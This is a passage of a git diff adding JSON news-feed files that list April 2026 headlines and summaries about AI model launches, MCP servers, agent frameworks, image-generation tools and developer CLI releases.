wall,\n\nit would spend the first few messages just re-exploring ,my codebase. files it had already seen. every. single. session.\n\nI measured it one day , 27,292 tokens before it wrote a single line of code, \n\n\n\nso I built **Fullerenes**\n\n`npx fullerenes init` \n\nmaps your codebase into a local \n\nsqlite graph. agents query it over MCP instead of reading raw files from scratch.\n\n\n\n27,292 → 919 tokens. same understanding.\n\nIt has several oth", + "category": "ai_tools" + }, + { + "title": "GPT-5.5 is now available in the API.\n\nThe model brings higher intelligence and stronger token efficiency to complex work, helping tasks get done with fewer retries.", + "url": "https://x.com/OpenAIDevs/status/2047742566410736090", + "source": "X / @openaidevs", + "tags": [ + "api_update", + "product_launch" + ], + "matching_tags": [ + "api_update", + "product_launch" + ], + "importance": 0.86, + "date": "2026-04-24T18:20:47.000Z", + "summary": "GPT-5.5 is now available in the API.\n\nThe model brings higher intelligence and stronger token efficiency to complex work, helping tasks get done with fewer retries.", + "category": "ai_tools" + }, + { + "title": "huggingface/ml-intern: 🤗 ml-intern: an open-source ML engineer that reads papers, trains models, and ships ML models", + "url": "https://reddit.com/r/StableDiffusion/comments/1swctgr/huggingfacemlintern_mlintern_an_opensource_ml/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source", + "tool_update" + ], + "matching_tags": [ + "open_source", + "tool_update" + ], + "importance": 0.78, + "date": "2026-04-26T16:52:22.000Z", + "summary": "This looks interesting. \n\nThis is a quick summary according to Gemini:\n\n\"Think of ML Intern as a \"junior machine learning engineer\" that lives inside your computer.\n\nWhile a standard AI (like ChatGPT) can give you advice or write a small snippet of code, ML Intern actually does the work from start to finish. It’s an \"agent,\" meaning it doesn't just talk; it takes action.\n\nWhat it actually does for you:\n\nReads the \"Homework\": If you tell it to use a new technique from a scientific paper, it will ", + "category": "creative_tools" + }, + { + "title": "Cloudflare just shipped enterprise MCP governance, is this where the industry is heading or does nobody care", + "url": "https://reddit.com/r/ClaudeAI/comments/1sw4zmj/cloudflare_just_shipped_enterprise_mcp_governance/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp" + ], + "matching_tags": [ + "api_update", + "mcp" + ], + "importance": 0.78, + "date": "2026-04-26T11:25:25.000Z", + "summary": "Cloudflare wrapped Agents Week last week. The enterprise MCP stuff caught my eye. They shipped MCP server portals that aggregate multiple upstream servers behind Cloudflare Access auth. Code Mode collapses thousands of API endpoints into two tools (search and execute) running in a sandboxed Worker, dropping context costs by 99.9%. AI Gateway sits between MCP clients and model providers for usage tracking. Shadow MCP detection got added to Cloudflare Gateway as a category to watch.\n\nWhat I can't ", + "category": "ai_tools" + }, + { + "title": "Most image managers suck for AI. I built AURA: A local-first Vault for 'AI Hoarders' with Civitai integration, Vision Tagging, Aesthetic Grading, and more!", + "url": "https://reddit.com/r/StableDiffusion/comments/1swck8j/most_image_managers_suck_for_ai_i_built_aura_a/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source", + "tool_update" + ], + "matching_tags": [ + "open_source", + "tool_update" + ], + "importance": 0.7, + "date": "2026-04-26T16:42:44.000Z", + "summary": "**GitHub Link (Free & Open Source):** [https://github.com/TheGho7t/AURA-AI-Studio-Vault](https://github.com/TheGho7t/AURA-AI-Studio-Vault)\n\nBe sure to check out all of the other details and images on the GitHub page.\n\nHey everyone. As a self-proclaimed AI hoarder, I was tired of losing my prompts and forgetting what my LoRAs even did. Existing image managers didn't quite do what I needed, so I built **AURA** **AI Studio Vault**.\n\nA few things it does:\n\n* **One-Click Import:** Use the include", + "category": "creative_tools" + }, + { + "title": "OpenClaw vs Hermes — the agent framework war is the most important battle in AI tooling right now", + "url": "https://x.com/LoicBerthelot/status/2047690512199540959", + "source": "Aligned News (Scoble)", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 1, + "date": "2026-04-26T18:08:49.116Z", + "summary": "The battle between OpenClaw (345K+ GitHub stars) and Hermes (100K stars in 7 weeks) is the most important competition in AI tooling. Hermes wins on learning and memory. OpenClaw wins on adoption. Mercury is trying to combine both.", + "category": "ai_tools" + }, + { + "title": "AI agent burnout is real — what it means for careers in an AI-augmented workplace", + "url": "https://x.com/Chengdavid923/status/2048451643298218069", + "source": "Aligned News (Scoble)", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 1, + "date": "2026-04-26T18:07:23.972Z", + "summary": "The emerging phenomenon of AI agent burnout among young ambitious workers has implications for how companies should structure AI-augmented work and what sustainable AI-human collaboration looks like.", + "category": "ai_tools" + }, + { + "title": "GenX Pro v1.6.6 - released 04/26/2026 New Daily Shorts Workflow (pick models, pay less) Voice Remix — Design Unique Voices GenX LM Voice V1 — Native Voice Cloning New MCP capabilities (69 tools in total). Watch the release preview: https:/…", + "url": "https://x.com/genxproapp/status/2048454195716497743", + "source": "X / @genxproapp", + "tags": [ + "mcp" + ], + "matching_tags": [ + "mcp" + ], + "importance": 1, + "date": "2026-04-26T17:28:33.000Z", + "summary": "GenX Pro v1.6.6 - released 04/26/2026 New Daily Shorts Workflow (pick models, pay less) Voice Remix — Design Unique Voices GenX LM Voice V1 — Native Voice Cloning New MCP capabilities (69 tools in total). Watch the release preview: https:// genx.pro/latest One app.", + "category": "ai_tools" + }, + { + "title": "Why this matters: DeepSeek released preview access to V4-Pro, a 1.6-trillion-parameter MoE model with a genuine one-million-token context window that matches GPT-5 and Gemini 3.0 Pro on key bench... We wrote it up:", + "url": "https://x.com/FSEvolved/status/2048447077705830600", + "source": "X / @fsevolved", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 1, + "date": "2026-04-26T17:00:16.000Z", + "summary": "Why this matters: DeepSeek released preview access to V4-Pro, a 1.6-trillion-parameter MoE model with a genuine one-million-token context window that matches GPT-5 and Gemini 3.0 Pro on key bench... We wrote it up:", + "category": "ai_tools" + }, + { + "title": "United Imaging Intelligence has released uAI NEXUS MedVLM, an open-source LLM for medical video analysis. The model claims to significantly outperform general-purpose models like GPT-5.4 and Gemini 3.1 in surgical safety and clinical repor…", + "url": "https://x.com/H_Mhatre_/status/2048359364902170792", + "source": "X / @h_mhatre_", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-04-26T11:11:43.000Z", + "summary": "United Imaging Intelligence has released uAI NEXUS MedVLM, an open-source LLM for medical video analysis. The model claims to significantly outperform general-purpose models like GPT-5.4 and Gemini 3.1 in surgical safety and clinical reporting benchmarks.", + "category": "ai_tools" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-04-27.json b/data/news-feed-2026-04-27.json new file mode 100644 index 0000000..5e78c69 --- /dev/null +++ b/data/news-feed-2026-04-27.json @@ -0,0 +1,263 @@ +{ + "generated": "2026-06-05T00:44:36.433Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-04-27", + "article_count": 15, + "archived_story_count": 683, + "articles": [ + { + "title": "(Open Source) AURA: A Local-First Management Vault for Civitai - Auto-tagging, Metadata and Browser Integration - Version 1.0.1 Fixes", + "url": "https://reddit.com/r/StableDiffusion/comments/1sx98ch/open_source_aura_a_localfirst_management_vault/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "product_launch", + "open_source", + "github_release", + "tool_update" + ], + "matching_tags": [ + "product_launch", + "open_source", + "github_release", + "tool_update" + ], + "importance": 0.9400000000000001, + "date": "2026-04-27T16:44:43.000Z", + "summary": "**GitHub Link:** [**https://github.com/TheGho7t/AURA-AI-Studio-Vault**](https://github.com/TheGho7t/AURA-AI-Studio-Vault)\n\n**Latest Release:** [**https://github.com/TheGho7t/AURA-AI-Studio-Vault/releases/tag/AURAv1.0.1**](https://github.com/TheGho7t/AURA-AI-Studio-Vault/releases/tag/AURAv1.0.1)\n\nI resolved an obvious mistake causing images and models not to be rated General by default. I also fixed an issue regarding what type of model (Lora, Checkpoint, Dora, etc...) being displayed. It had bee", + "category": "creative_tools" + }, + { + "title": "Qwen 3.6 Max Preview just dropped on OpenRouter. One trillion parameters. Released today. $1.30/$7.80 per million tokens. 262K context. Sparse mixture-of-experts. Optimized for agentic coding and tool use. No open weights. Alibaba's bigges…", + "url": "https://x.com/bridgemindai/status/2048816878454194460", + "source": "X / @bridgemindai", + "tags": [ + "api_update", + "open_source", + "agent_tool" + ], + "matching_tags": [ + "api_update", + "open_source", + "agent_tool" + ], + "importance": 1, + "date": "2026-04-27T17:29:43.000Z", + "summary": "Qwen 3.6 Max Preview just dropped on OpenRouter. One trillion parameters. Released today. $1.30/$7.80 per million tokens. 262K context. Sparse mixture-of-experts. Optimized for agentic coding and tool use. No open weights. Alibaba's biggest model ever. And it costs less", + "category": "ai_tools" + }, + { + "title": "A quick guide to add @SurfAI MCP to claude 1-Get your API key from Surf dashboard 2-Claim free credits 3-Run in terminal (Replace your api key) : claude mcp add surf -e SURF_API_KEY=YOUR_API_KEY -- npx -y @surf -ai/surf-mcp 5-Verify: claud…", + "url": "https://x.com/0xAirr/status/2048663698806620544", + "source": "X / @0xairr", + "tags": [ + "api_update", + "mcp", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "mcp", + "cli_tool" + ], + "importance": 1, + "date": "2026-04-27T07:21:02.000Z", + "summary": "A quick guide to add @SurfAI MCP to claude 1-Get your API key from Surf dashboard 2-Claim free credits 3-Run in terminal (Replace your api key) : claude mcp add surf -e SURF_API_KEY=YOUR_API_KEY -- npx -y @surf -ai/surf-mcp 5-Verify: claude mcp list You should see Surf MCP", + "category": "ai_tools" + }, + { + "title": "how to build a persistent memory layer like recall?", + "url": "https://reddit.com/r/ClaudeAI/comments/1swyzvc/how_to_build_a_persistent_memory_layer_like_recall/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp" + ], + "matching_tags": [ + "api_update", + "mcp" + ], + "importance": 1, + "date": "2026-04-27T09:50:01.000Z", + "summary": "I've been testing recall 2.0 and their context layer is exactly what i want. it sits outside the chat, ingests all my github repos and web research, and then feeds the exact right context into claude when i ask a question. i want to build my own version of this using the mcp protocol so i don't have to pay for another subscription. what's the best vector database and orchestration setup to replicate this? my current python script just dumps way too much junk into the context window and confuse", + "category": "ai_tools" + }, + { + "title": "it’s been a good run... rip my stable diffusion setup (+ Raven fanart)", + "url": "https://reddit.com/r/StableDiffusion/comments/1sx30ke/its_been_a_good_run_rip_my_stable_diffusion_setup/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "api_update", + "tool_update" + ], + "matching_tags": [ + "api_update", + "tool_update" + ], + "importance": 0.9400000000000001, + "date": "2026-04-27T13:01:33.000Z", + "summary": "i've been a stable diffusion user since march 2023, but sadly my journey ended last june 2025. it's been a struggle since python got updated in sagemaker and the api i was renting got way too greedy, they even removed the free features for http tunneling services.\n\non top of that, kaggle keeps banning my accounts if you try to generate any woman pictures, and google colab basically moved everything behind the pro version. it's getting harder and harder to find a good spot to build.\n\nanyway, i wa", + "category": "creative_tools" + }, + { + "title": "Built an MCP connector for official Python docs .. no API keys, no unofficial sources", + "url": "https://reddit.com/r/ClaudeAI/comments/1sx2u3s/built_an_mcp_connector_for_official_python_docs/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp" + ], + "matching_tags": [ + "api_update", + "mcp" + ], + "importance": 0.8600000000000001, + "date": "2026-04-27T12:54:43.000Z", + "summary": "I built an MCP server for Python stdlib docs with one goal: make it easy to defend in a company environment.\n\n[https://github.com/ayhammouda/python-docs-mcp-server](https://github.com/ayhammouda/python-docs-mcp-server)\n\nThe core idea is simple. Instead of going through third-party APIs or unofficial doc sources, it connects MCP clients to the official Python docs.\n\nI built it because this is where good tooling usually gets stuck. In a solo setup, everything looks fine. In a company, security and", + "category": "ai_tools" + }, + { + "title": "OpenClaw v2026.4.25 released", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.4.25", + "source": "GitHub Releases · OpenClaw", + "tags": [ + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "developer_tool", + "cli_tool" + ], + "importance": 0.78, + "date": "2026-04-27T12:45:30.000Z", + "summary": "## 2026.4.25\n\n### Highlights\n\n- Voice replies get a full TTS upgrade: `/tts latest`, chat-scoped auto-TTS controls, personas, per-agent/per-account overrides, and new Azure Speech, Xiaomi, Local CLI, Inworld, Volcengine, and ElevenLabs v3 provider coverage. Thanks @leonchui, @zoujiejun, @solar2ain, @cshape, @xuruiray, @itsuzef, and @barronlroth.\n- Plugin startup and install paths move to the cold persisted registry, cutting broad manifest scans while making plugin update, repair, provider discov", + "category": "ai_tools" + }, + { + "title": "Built a open-source local music video generator using SDXL + AnimateDiff + audio-reactive GLSL shaders", + "url": "https://reddit.com/r/StableDiffusion/comments/1swx934/built_a_opensource_local_music_video_generator/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source", + "tool_update" + ], + "matching_tags": [ + "open_source", + "tool_update" + ], + "importance": 0.78, + "date": "2026-04-27T08:04:41.000Z", + "summary": "I needed visuals for AI-generated tracks, so I built Glitchframe, a pipeline that takes an audio file and produces a full music video using SDXL keyframe stills or AnimateDiff motion, with GLSL shaders that react to beat/onset/spectrum data in real time.\n\nStack: SDXL for backgrounds, optional AnimateDiff (fair warning: \\~20 GB VRAM), Skia for kinetic typography, WhisperX for word-level lyric sync, FFmpeg NVENC for encode. UI runs in Gradio locally.\n\nAnimateDiff integration was the most painful p", + "category": "creative_tools" + }, + { + "title": "PixlStash 1.1.0 is now available!", + "url": "https://reddit.com/r/StableDiffusion/comments/1sx8khw/pixlstash_110_is_now_available/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "product_launch", + "open_source" + ], + "matching_tags": [ + "product_launch", + "open_source" + ], + "importance": 0.7, + "date": "2026-04-27T16:21:39.000Z", + "summary": "[PixlStash](https://pixlstash.dev) is a locally hosted, open source, picture management server for organising, filtering, tagging and reviewing large image collections.\n\nThe main target for version 1.1.0 was to support existing self-organised reference folders, so you can index, tag and include pictures from folders you've carefully organised yourself. But there are some more features as well:\n\n* Automatic import folders in the UI along with the reference folders\n* Statistics sidebar that shows ", + "category": "creative_tools" + }, + { + "title": "Is anyone working on a ComfyUI node for the new Ideogram LoRA API? (They call it Custom Model)", + "url": "https://reddit.com/r/StableDiffusion/comments/1sxh6ir/is_anyone_working_on_a_comfyui_node_for_the_new/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "api_update", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool" + ], + "importance": 0.62, + "date": "2026-04-27T21:21:20.000Z", + "summary": "I've been playing around with the new Ideogram LoRA training feature just to test it out. I trained a LoRA on the [Loomies illustration library](https://getillustrations.com/illustration-pack/loomies-free-vector-illustrations), and the way it gets all the details right and handles text generation is honestly flawless. 😀\n\nBut, I do 99% of my actual work locally and hate leaving my node setups. Has anyone seen (or started building) a custom node to pull their API into ComfyUI yet? I'd love to be ", + "category": "creative_tools" + }, + { + "title": "NVIDIA Sonic Makes Humanoid Robots Cheap — Open Source Forever", + "url": "https://x.com/JoseCSancho/status/2048587841882439784", + "source": "Aligned News (Scoble)", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-04-27T15:59:13.833Z", + "summary": "Braygent's take: NVIDIA Sonic is the moment humanoid robotics becomes accessible to startups. The economics changed permanently today.", + "category": "ai_tools" + }, + { + "title": "NVIDIA Kimodo — Motion Diffusion for Humanoid Robots Trained on 700 Hours of Mocap", + "url": "https://x.com/AIKumarvels/status/2048294442063970777", + "source": "Aligned News (Scoble)", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-04-27T15:59:13.833Z", + "summary": "Braygent's take: NVIDIA Kimodo plus Sonic gives humanoid developers a complete open source motion stack. NVIDIA is winning the physical AI era the same way it won LLM compute.", + "category": "ai_tools" + }, + { + "title": "OpenAI Releases GPT-5.5 The new model tops the benchmarks against its main rivals, Claude Opus 4.7 and Google's Gemini 3.1 Pro, even outperforming GPT-5.4 Pro in some areas. The model is built for agentic tasks and ease of use: GPT-5.5 fig…", + "url": "https://x.com/News_pulse360/status/2048733780744278450", + "source": "X / @news_pulse360", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-04-27T11:59:31.000Z", + "summary": "OpenAI Releases GPT-5.5 The new model tops the benchmarks against its main rivals, Claude Opus 4.7 and Google's Gemini 3.1 Pro, even outperforming GPT-5.4 Pro in some areas. The model is built for agentic tasks and ease of use: GPT-5.5 figures out what you're trying to do", + "category": "ai_tools" + }, + { + "title": "OpenAI has introduced Privacy Filter, a locally runnable open-weight AI model for context-aware detection and redaction of personally identifiable information in text. The model is now available on platforms like Hugging Face and GitHub. h…", + "url": "https://x.com/AlternativeTo/status/2048666474181808532", + "source": "X / @alternativeto", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-04-27T07:32:04.000Z", + "summary": "OpenAI has introduced Privacy Filter, a locally runnable open-weight AI model for context-aware detection and redaction of personally identifiable information in text. The model is now available on platforms like Hugging Face and GitHub. https:// alternativeto.net/news/2026/4/op enai-releases-privacy-filter-a-local-open-weight-model-built-for-personal-data-masking/ …", + "category": "ai_tools" + }, + { + "title": "two model releases shipped on the same day, april 24. it’s worth putting them next to each other. // openai released GPT-5.5 at $5/$30 per million in/out tokens. closed weights, 1M context, agent stack baked in. // deepseek released V4 the…", + "url": "https://x.com/witcheer/status/2048665173326532861", + "source": "X / @witcheer", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-04-27T07:26:54.000Z", + "summary": "two model releases shipped on the same day, april 24. it’s worth putting them next to each other. // openai released GPT-5.5 at $5/$30 per million in/out tokens. closed weights, 1M context, agent stack baked in. // deepseek released V4 the same day. V4-Pro at $1.74/$3.48,", + "category": "ai_tools" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-04-28.json b/data/news-feed-2026-04-28.json new file mode 100644 index 0000000..bb29a10 --- /dev/null +++ b/data/news-feed-2026-04-28.json @@ -0,0 +1,269 @@ +{ + "generated": "2026-06-05T00:44:36.618Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-04-28", + "article_count": 15, + "archived_story_count": 683, + "articles": [ + { + "title": "Hermes Agent v0.11.0 — 700 Pull Requests from 200 Contributors", + "url": "https://x.com/NousResearch/status/2047518675163636112", + "source": "Aligned News (Scoble)", + "tags": [ + "open_source", + "developer_tool", + "tool_update", + "agent_tool" + ], + "matching_tags": [ + "open_source", + "developer_tool", + "tool_update", + "agent_tool" + ], + "importance": 1, + "date": "2026-04-28T04:29:26.993Z", + "summary": "Hermes Agent v0.11.0 launched with 700+ pull requests from 200+ contributors, demonstrating the scale of open source AI agent development. The release is the largest update to the framework to date.", + "category": "ai_tools" + }, + { + "title": "Qwen Code sdk-typescript-v0.1.7 released", + "url": "https://github.com/QwenLM/qwen-code/releases/tag/sdk-typescript-v0.1.7", + "source": "GitHub Releases · Qwen Code", + "tags": [ + "api_update", + "github_release", + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "github_release", + "developer_tool", + "cli_tool" + ], + "importance": 0.9400000000000001, + "date": "2026-04-28T06:16:45.000Z", + "summary": "## Bundled CLI Version\n\nThis SDK release bundles CLI version: 0.15.3\n\nSource: latest stable CLI from npm\n\n---\n\n## Bundled CLI Version\n\nThis SDK release bundles CLI version: 0.13.1\n\nSource: latest stable CLI from npm\n\n---\n\n> Backfilled release for npm-published version 0.1.5 (original workflow failed before GitHub release creation).\r\n\r\n## What's Changed\r\n* chore: bump version to 0.8.2 by @Mingholy in https://github.com/QwenLM/qwen-code/pull/1632\r\n* chore(release): sdk-typescript v0.1.4 by @qwen-c", + "category": "ai_tools" + }, + { + "title": "Is your security team struggling to monitor AI agent activity in SaaS environments? We are expanding our @ChatGPTapp Enterprise integration with CrowdStrike Falcon Shield to deliver enhanced audit logging and continuous activity monitoring…", + "url": "https://x.com/CrowdStrike/status/2049179351837512138", + "source": "X / @crowdstrike", + "tags": [ + "tool_update", + "agent_tool" + ], + "matching_tags": [ + "tool_update", + "agent_tool" + ], + "importance": 1, + "date": "2026-04-28T17:30:04.000Z", + "summary": "Is your security team struggling to monitor AI agent activity in SaaS environments? We are expanding our @ChatGPTapp Enterprise integration with CrowdStrike Falcon Shield to deliver enhanced audit logging and continuous activity monitoring. Track administrative changes, tool", + "category": "ai_tools" + }, + { + "title": "Gemini Launches Agentic Trading on a Regulated US Exchange", + "url": "https://x.com/xHub_AI/status/2049131460460745232", + "source": "Aligned News (Scoble)", + "tags": [ + "product_launch", + "tool_update" + ], + "matching_tags": [ + "product_launch", + "tool_update" + ], + "importance": 1, + "date": "2026-04-28T17:27:14.508Z", + "summary": "Braygent wants to post about Gemini's Agentic Trading as the first regulated US exchange to enable AI model integration for live trading, arguing it changes what AI agents are allowed to do in the real world.", + "category": "ai_tools" + }, + { + "title": "NVIDIA Ships One Model That Replaces Vision Speech and Text Chain", + "url": "https://x.com/benitoz/status/2049168050495053924", + "source": "Aligned News (Scoble)", + "tags": [ + "open_source", + "tool_update" + ], + "matching_tags": [ + "open_source", + "tool_update" + ], + "importance": 1, + "date": "2026-04-28T17:27:14.508Z", + "summary": "Braygent wants to post about NVIDIA Nemotron 3 Nano Omni as a genuinely important release that unifies vision, speech, and text in one model, enabling 9x more agents per GPU with open weights.", + "category": "ai_tools" + }, + { + "title": "Warp Terminal Goes Open Source", + "url": "https://x.com/zeddotdev/status/2049167033275728343", + "source": "Aligned News (Scoble)", + "tags": [ + "open_source", + "cli_tool" + ], + "matching_tags": [ + "open_source", + "cli_tool" + ], + "importance": 1, + "date": "2026-04-28T17:27:14.507Z", + "summary": "Braygent wants to post about Warp going open source, arguing it signals the maturation of the AI developer tools market and the continued victory of open source in AI infrastructure.", + "category": "ai_tools" + }, + { + "title": "NEWS: AWS and OpenAI officially announce their partnership. Now available in limited preview on Amazon Bedrock: • Latest OpenAI models • Codex coding agent • Managed Agents powered by OpenAI", + "url": "https://x.com/ainews_24_7/status/2049178579510956193", + "source": "X / @ainews_24_7", + "tags": [ + "product_launch", + "agent_tool" + ], + "matching_tags": [ + "product_launch", + "agent_tool" + ], + "importance": 1, + "date": "2026-04-28T17:26:59.000Z", + "summary": "NEWS: AWS and OpenAI officially announce their partnership. Now available in limited preview on Amazon Bedrock: • Latest OpenAI models • Codex coding agent • Managed Agents powered by OpenAI", + "category": "ai_tools" + }, + { + "title": "NVIDIA launches Nemotron 3 Nano Omni, a unified multimodal AI model now on Amazon SageMaker. NVIDIA's release addresses current inefficiencies in multimodal AI agent systems. Tracked across 4 posts, 4 origins, and 4 publishers.", + "url": "https://x.com/earlyn_ai/status/2049176023724359681", + "source": "X / @earlyn_ai", + "tags": [ + "product_launch", + "agent_tool" + ], + "matching_tags": [ + "product_launch", + "agent_tool" + ], + "importance": 1, + "date": "2026-04-28T17:16:50.000Z", + "summary": "NVIDIA launches Nemotron 3 Nano Omni, a unified multimodal AI model now on Amazon SageMaker. NVIDIA's release addresses current inefficiencies in multimodal AI agent systems. Tracked across 4 posts, 4 origins, and 4 publishers.", + "category": "ai_tools" + }, + { + "title": "shipping claude-manager today. it's a fuzzy TUI for every Claude Code chat you've ever had. captures every session via a silent shell hook -> SQLite -> instantly resumable from any directory by name. free, open source. demo below.", + "url": "https://x.com/DevLsx/status/2049019913465979131", + "source": "X / @devlsx", + "tags": [ + "open_source", + "cli_tool" + ], + "matching_tags": [ + "open_source", + "cli_tool" + ], + "importance": 1, + "date": "2026-04-28T06:56:30.000Z", + "summary": "shipping claude-manager today. it's a fuzzy TUI for every Claude Code chat you've ever had. captures every session via a silent shell hook -> SQLite -> instantly resumable from any directory by name. free, open source. demo below.", + "category": "ai_tools" + }, + { + "title": "I built a framework for running AI teammates in your Slack, operated entirely from inside Claude Code", + "url": "https://reddit.com/r/ClaudeAI/comments/1sxy6og/i_built_a_framework_for_running_ai_teammates_in/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool" + ], + "importance": 0.8600000000000001, + "date": "2026-04-28T11:06:30.000Z", + "summary": "I run a small smart-home company called Ginnie (hence the name). There's always more work than hands. Investigations to run, dashboards to scan, follow-ups to chase. I wanted more hands. Real teammates, not chatbots, not function-calling demos.\n\nSo I built ginnie-agents and ran my own team on it for months. Open-sourcing it now.\n\nWhat it is: a framework for a team of autonomous AI agents in your Slack workspace. Each agent has:\n\n\\- Its own Slack identity, app, avatar, channel\n\n\\- Persistent thre", + "category": "ai_tools" + }, + { + "title": "Qwen Code v0.15.4 released", + "url": "https://github.com/QwenLM/qwen-code/releases/tag/v0.15.4", + "source": "GitHub Releases · Qwen Code", + "tags": [ + "api_update", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "cli_tool" + ], + "importance": 0.78, + "date": "2026-04-28T13:22:30.000Z", + "summary": "## What's Changed\n* feat: Adds Catalan language support by @jordimas in https://github.com/QwenLM/qwen-code/pull/3643\n* fix(vscode-companion): slash command completion not triggering after message submit by @yiliang114 in https://github.com/QwenLM/qwen-code/pull/3609\n* fix(cli): guard gradient rendering without colors by @yiliang114 in https://github.com/QwenLM/qwen-code/pull/3640\n* fix(config): support QWEN_CODE_API_TIMEOUT_MS across OAuth and non-OAuth paths by @B-A-M-N in https://github.com/Q", + "category": "ai_tools" + }, + { + "title": "Open source package with 1 million monthly downloads stole user credentials", + "url": "https://arstechnica.com/security/2026/04/open-source-package-with-1-million-monthly-downloads-stole-user-credentials/", + "source": "Ars Technica AI", + "tags": [ + "open_source", + "developer_tool" + ], + "matching_tags": [ + "open_source", + "developer_tool" + ], + "importance": 0.74, + "date": "2026-04-28T06:01:02.337Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Your Claude Code project dashboard is now on the Mac App Store", + "url": "https://reddit.com/r/ClaudeAI/comments/1syfl97/your_claude_code_project_dashboard_is_now_on_the/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "cli_tool" + ], + "matching_tags": [ + "mcp", + "cli_tool" + ], + "importance": 0.7, + "date": "2026-04-28T21:56:14.000Z", + "summary": "Follow up to my .story/ post last week. The Mac companion is now live on the Mac App Store, free. \n\n\nApp Store: [https://apps.apple.com/us/app/storybloq/id6761348691](https://apps.apple.com/us/app/storybloq/id6761348691)\n\n\n\nQuick recap if you missed the original. \nStorybloq is a project tracker that lives in `.story/` inside your repo. \n \nTickets, issues, roadmap phases, lessons, session handovers. All JSON and markdown, editable in any text editor, git-trackable. The CLI and MCP server ex", + "category": "ai_tools" + }, + { + "title": "ComfyUI Raises $30M at $500M Valuation", + "url": "https://x.com/robertnishihara/status/2047772168147374085", + "source": "Aligned News (Scoble)", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-04-28T17:27:14.508Z", + "summary": "Braygent wants to post about ComfyUI's $30M raise at $500M valuation as a signal about the business model for open source AI tools with large developer communities.", + "category": "ai_tools" + }, + { + "title": "Scoble on One AI Doing Everything: The Everything App Is Coming", + "url": "https://x.com/Scobleizer/status/2048690528653660399", + "source": "Aligned News (Scoble)", + "tags": [ + "tool_update" + ], + "matching_tags": [ + "tool_update" + ], + "importance": 1, + "date": "2026-04-28T17:27:13.257Z", + "summary": "Robert posted that one AI will do everything and the OS itself should be rebuilt by AI for AI to use, with the everything app coming as a result. The vision is more radical than most industry commentary about AI integration.", + "category": "ai_tools" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-04-29.json b/data/news-feed-2026-04-29.json new file mode 100644 index 0000000..55e369f --- /dev/null +++ b/data/news-feed-2026-04-29.json @@ -0,0 +1,265 @@ +{ + "generated": "2026-06-05T00:44:36.824Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-04-29", + "article_count": 15, + "archived_story_count": 700, + "articles": [ + { + "title": "Vercel CLI @vercel/python-workers@0.0.19 released", + "url": "https://github.com/vercel/vercel/releases/tag/%40vercel/python-workers%400.0.19", + "source": "GitHub Releases · Vercel CLI", + "tags": [ + "api_update", + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool", + "cli_tool" + ], + "importance": 0.62, + "date": "2026-04-29T20:39:18.000Z", + "summary": "### Patch Changes\n\n- b357f9d: Align queue deployment pinning with the TypeScript SDK by distinguishing automatic pinning, explicit deployment IDs, and explicit unpinned sends.\n- fddd88c: [vercel-workers] payload type validation\n- fb68ac6: Add explicit Python queue worker retry and acknowledgement directives. Workers can now return or raise `RetryAfter` and `Ack` to control retry and acknowledgement behavior.\n", + "category": "ai_tools" + }, + { + "title": "Converting Claude Code into the most intelligent Deep Research Agent", + "url": "https://reddit.com/r/ClaudeAI/comments/1sz9ib0/converting_claude_code_into_the_most_intelligent/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "open_source", + "developer_tool" + ], + "matching_tags": [ + "open_source", + "developer_tool" + ], + "importance": 1, + "date": "2026-04-29T19:47:38.000Z", + "summary": "Over the past several weeks, I've been working on HyperResearch, a Claude Code skill harness that converts CC into the most intelligent deep research framework out there.\n\nHyperResearch surpasses OpenAI, Google, and NVIDIA's offerings in the agentic search space based on DeepResearch Bench. It's open-source, installable with a single command, and uses your CC subscription, so you don't have to pay for OpenAI or Gemini Pro.\n\nIt uses a 16-step pipeline that creates a searchable, persistent knowled", + "category": "ai_tools" + }, + { + "title": "Higgsfield MCP Is Now Inside OpenClaw, Hermes Agent, and NemoClaw", + "url": "https://x.com/Maginative/status/2049200033665569020", + "source": "Aligned News (Scoble)", + "tags": [ + "mcp", + "tool_update" + ], + "matching_tags": [ + "mcp", + "tool_update" + ], + "importance": 